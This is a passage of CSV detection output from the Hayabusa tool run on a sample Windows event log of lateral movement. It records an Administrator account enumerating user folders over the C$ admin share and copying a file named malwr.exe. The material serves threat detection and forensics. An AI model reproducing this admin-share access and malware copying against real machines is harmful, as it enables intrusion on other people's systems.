\\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Documents | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\Links | IP Addr: 10.0.2.15 | 
LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Saved Games | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Contacts | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Music | IP Addr: 10.0.2.15 | 
LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:26.981 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:26.981 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:27.061 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:27.071 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:27.081 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ui\SwDRM.dll | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:27.081 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:45.488 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:45.548 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:45.548 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:47.721 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:47.721 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01 | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:56.403 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:56.414 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\AppData | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:58.386 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:04.105 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Fonts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Media\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:07.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | 